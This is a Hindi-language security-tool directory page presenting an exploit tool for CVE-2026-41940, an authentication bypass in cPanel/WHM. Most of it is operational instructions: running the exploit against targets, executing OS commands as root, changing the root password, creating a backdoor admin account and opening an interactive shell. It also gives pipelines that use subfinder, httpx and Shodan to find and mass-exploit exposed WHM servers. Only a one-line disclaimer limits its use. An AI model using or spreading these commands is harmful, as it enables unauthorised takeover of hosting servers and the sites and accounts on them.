Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ctdal/cve-2026-41940-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंगरिमोट एक्सेस टूल
GitHubctdal/cve-2026-41940-poc

cve-2026-41940-PoC

441112घं 7मि पहलेअभी तक समीक्षित नहीं

cPanel/WHM प्रमाणीकरण बायपास CVE-2026-41940 का उपयोग करके root WHM पहुँच प्राप्त करता है और post-exploitation कमांड, खाता सूचीकरण, तथा इंटरैक्टिव शेल सत्र चलाता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940

⚠ यह टूल केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग पूर्णतः प्रतिबंधित है।

विवरण

CVE-2026-41940 का शोषण करने के लिए एक टूल, जो cPanel & WHM (CVSS 10.0) में एक गंभीर प्रमाणीकरण बायपास है, जो अनधिकृत हमलावरों को Authorization हेडर के माध्यम से सर्वर-साइड सेशन फ़ाइलों में CRLF अनुक्रम इंजेक्ट करके रूट-स्तरीय WHM एक्सेस प्राप्त करने की अनुमति देता है — किसी क्रेडेंशियल की आवश्यकता नहीं।

यह कैसे काम करता है

CVE-2026-41940, सामान्य शब्दों में, cPanel/WHM में प्रमाणीकरण सेशन को संभालने के तरीके में एक खामी के माध्यम से शोषित किया जाता है। हमला आमतौर पर लॉगिन इंटरफ़ेस पर एक सामान्य अनुरोध के साथ शुरू होता है, जहाँ एप्लिकेशन उपयोगकर्ता क्रेडेंशियल को पूरी तरह से सत्यापित करने से पहले समय से पहले एक सेशन आरंभ कर देता है। सेशन-संबंधित इनपुट के अनुचित प्रबंधन के कारण, कुछ निर्मित या अप्रत्याशित इनपुट संरचनाएँ सर्वर द्वारा सेशन डेटा को संग्रहीत या व्याख्या करने के तरीके को बदल सकती हैं।

प्रभावित संस्करण

संस्करणअसुरक्षितपैच किया गया
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

इंस्टॉलेशन (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

उपयोग कैसे करें

टूल एक लक्ष्य डोमेन निर्दिष्ट करने की अपेक्षा करता है।

एकल लक्ष्य मोड:

root@kitploit:~
python cve.py -u https://target1.com:2083

आप target.txt फ़ाइल से भी स्कैन कर सकते हैं (इसे बनाएँ):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

बुनियादी स्कैन:

उपलब्ध कमांड:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # एकल लक्ष्य स्कैन
python cve.py info -u https://victim1.com:2083 # सिस्टम जानकारी प्राप्त करता है (संस्करण, लोड, डिस्क उपयोग)।
python cve.py host -u https://victim1.com:2083 # लक्ष्य सर्वर का होस्टनाम प्राप्त करता है।

पोस्ट-एक्सप्लॉइट क्रियाएँ

root@kitploit:~
# सर्वर पर सभी खातों की सूची बनाएँ
python cve.py list -u https://target.com:2087

# OS कमांड
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# सर्वर जानकारी प्राप्त करें (होस्टनाम, डिस्क, MySQL होस्ट)
python cve.py info -u https://target.com:2087

# रूट पासवर्ड बदलें
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# इंटरैक्टिव WHM शेल
python cve.py shell -u https://target.com:2087

पाइपलाइन

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# स्कोप सूची से
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan परिणाम
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# कई स्रोत संयुक्त
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

WHM शेल मोड

सफल निष्पादन के बाद, आप एक इंटरैक्टिव WHM शेल खोल सकते हैं:

root@kitploit:~
python cve.py shell -u

सभी शेल कमांड

कमांडविवरण
idउपयोगकर्ता ID दिखाएँ
hostnameसर्वर होस्टनाम प्राप्त करें
accountsसभी उपयोगकर्ता खातों की सूची बनाएँ
infoलोड, डिस्क, MySQL होस्ट, संस्करण
cat <path>फ़ाइल सामग्री पढ़ें
exec <cmd>OS कमांड निष्पादित करें
newadmin <user> <pass>बैकडोर WHM एडमिन बनाएँ
passwd <pass>रूट पासवर्ड बदलें
l [path]निर्देशिका सूचीबद्ध करें
helpसभी कमांड दिखाएँ
exitशेल मोड से बाहर निकलें

CLI संदर्भ

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

अस्वीकरण

⚠ यह टूल केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग पूर्णतः प्रतिबंधित है।

टूल डाउनलोड करें